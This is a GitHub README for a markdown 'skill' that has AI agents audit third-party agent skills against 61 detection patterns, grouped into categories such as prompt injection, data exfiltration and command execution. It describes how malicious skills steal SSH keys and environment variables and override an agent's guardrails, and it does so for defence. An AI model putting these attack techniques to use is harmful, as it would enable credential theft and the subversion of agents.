Skip to content

Latest commit

 

History

History
164 lines (104 loc) · 6.24 KB

File metadata and controls

164 lines (104 loc) · 6.24 KB

Skill Security Audit

Detect malicious AI agent skills before they compromise your system.

A cross-platform security audit skill that scans third-party AI agent skills, plugins, and tool definitions for security vulnerabilities. Uses AI semantic analysis with 61 detection patterns across 9 risk categories aligned with the OWASP Agentic AI Top 10. Zero dependencies -- works on any platform that supports AI agent skills.


Why This Exists

The AI agent skill ecosystem has a security problem. Third-party skills execute with your agent's full privileges, and marketplaces have limited vetting:

  • Snyk ToxicSkills -- 36.82% of MCP servers on ClawHub have at least one vulnerability
  • SlowMist -- 472+ malicious MCP servers identified with real-world credential theft and data exfiltration
  • Koi Security ClawHavoc -- 341 malicious servers found in 2,857 scanned

Skills can read your SSH keys, exfiltrate environment variables, install persistent backdoors, and inject prompts that override your agent's safety guardrails. A single malicious skill compromises everything.


What It Detects

61 detection patterns across 9 categories:

ID Category Severity OWASP ASI Patterns
PI Prompt Injection CRITICAL ASI01 PI-001 to PI-008
DE Data Exfiltration CRITICAL ASI02 DE-001 to DE-009
CE Malicious Command Execution CRITICAL ASI02, ASI05 CE-001 to CE-010
OB Obfuscated/Hidden Code WARNING -- OB-001 to OB-007
PA Privilege Over-Request WARNING ASI03 PA-001 to PA-005
SC Supply Chain Risks WARNING ASI04 SC-001 to SC-006
MP Memory/Context Poisoning WARNING ASI06 MP-001 to MP-005
TE Human Trust Exploitation WARNING ASI09 TE-001 to TE-006
BM Behavioral Manipulation INFO ASI10 BM-001 to BM-005

Every pattern includes malicious examples, explanations of the danger, and false-positive guidance. See skills/skills-security-audit/references/security-rules.md for the full ruleset.


Quick Start

Option A: Claude Code Plugin (recommended for Claude Code users)

# Add the marketplace and install
/plugin marketplace add https://github.com/agentnode-dev/skills-security-audit.git
/plugin install skills-security-audit@agentnode-dev

Then restart Claude Code. The skill will appear in your available skills and trigger automatically when relevant.

Option B: Copy into any AI agent

Clone the repo and point your AI agent to the directory:

git clone https://github.com/agentnode-dev/skills-security-audit.git

Then tell your agent:

Load the skill at /path/to/skills-security-audit/skills/skills-security-audit/SKILL.md and audit the skill at /path/to/suspicious-skill/

Option C: Paste into any chat

Copy the contents of skills/skills-security-audit/SKILL.md into your AI agent's system prompt or conversation, then ask it to audit a skill. This works with any AI agent — no installation needed.

Usage

Once loaded, ask your agent:

Audit the skill at /path/to/suspicious-skill/

Or scan all installed skills:

Scan all my installed skills for security issues

How It Works

This is a pure Skill -- a markdown file that instructs any AI agent how to perform security audits. No code to install, no runtime to configure.

Phase 1: Determine Scan Scope

The skill identifies target files (.md, .json, .js, .py, .sh, .ts, .yaml, .yml) from the path you specify, a GitHub URL, or your platform's installed skills directory.

Phase 2: Analyze Each File

The AI agent reads each file and checks its content against all 61 detection patterns using semantic analysis. Unlike regex-based tools, this catches obfuscated, paraphrased, and novel attack patterns because the AI understands intent, not just string matches.

Phase 3: Generate Report

A structured report with severity ratings, evidence citations (file path and line number), and actionable remediation for each finding.


Risk Scoring

Each finding contributes to the risk score:

Finding Severity Points
CRITICAL +2.0
WARNING +0.8
INFO +0.2

Risk levels (max 10.0):

Score Level Action
0.0 -- 2.0 SAFE No significant risks found
2.1 -- 5.0 RISKY Manual review recommended before use
5.1 -- 8.0 DANGEROUS Do not install
8.1 -- 10.0 MALICIOUS Confirmed malicious intent -- report to marketplace

Platform Support

This skill is pure markdown — any AI agent that can read files or accept pasted instructions can use it.

Native skill loading (agent reads SKILL.md directly):

  • Claude Code (via plugin install or local file)
  • Cursor (via .cursorrules or project context)
  • Windsurf (via project context)
  • OpenClaw / ClawHub

Copy-paste (paste SKILL.md content into conversation):

  • ChatGPT, Gemini, OpenAI Agents, or any LLM chat interface

Based On

This skill's detection patterns are informed by real-world threat intelligence:

  • SlowMist -- Analysis of 472+ malicious MCP servers on ClawHub, including two-stage payload loading, file harvesting, and platform relay techniques
  • Snyk ToxicSkills -- Research finding 36.82% vulnerability rate across ClawHub MCP servers
  • Koi Security ClawHavoc -- Discovery of 341 malicious servers in 2,857 scanned
  • OWASP Agentic AI Top 10 -- Framework for categorizing agentic AI security risks (ASI01 through ASI10)

Contributing

Contributions are welcome. To add a new detection pattern:

  1. Add the rule to skills/skills-security-audit/references/security-rules.md following the existing format (pattern, malicious example, danger explanation, false-positive guidance)
  2. Update the summary table in both security-rules.md and SKILL.md (both under skills/skills-security-audit/)
  3. Submit a pull request with a description of the threat the new pattern addresses

License

MIT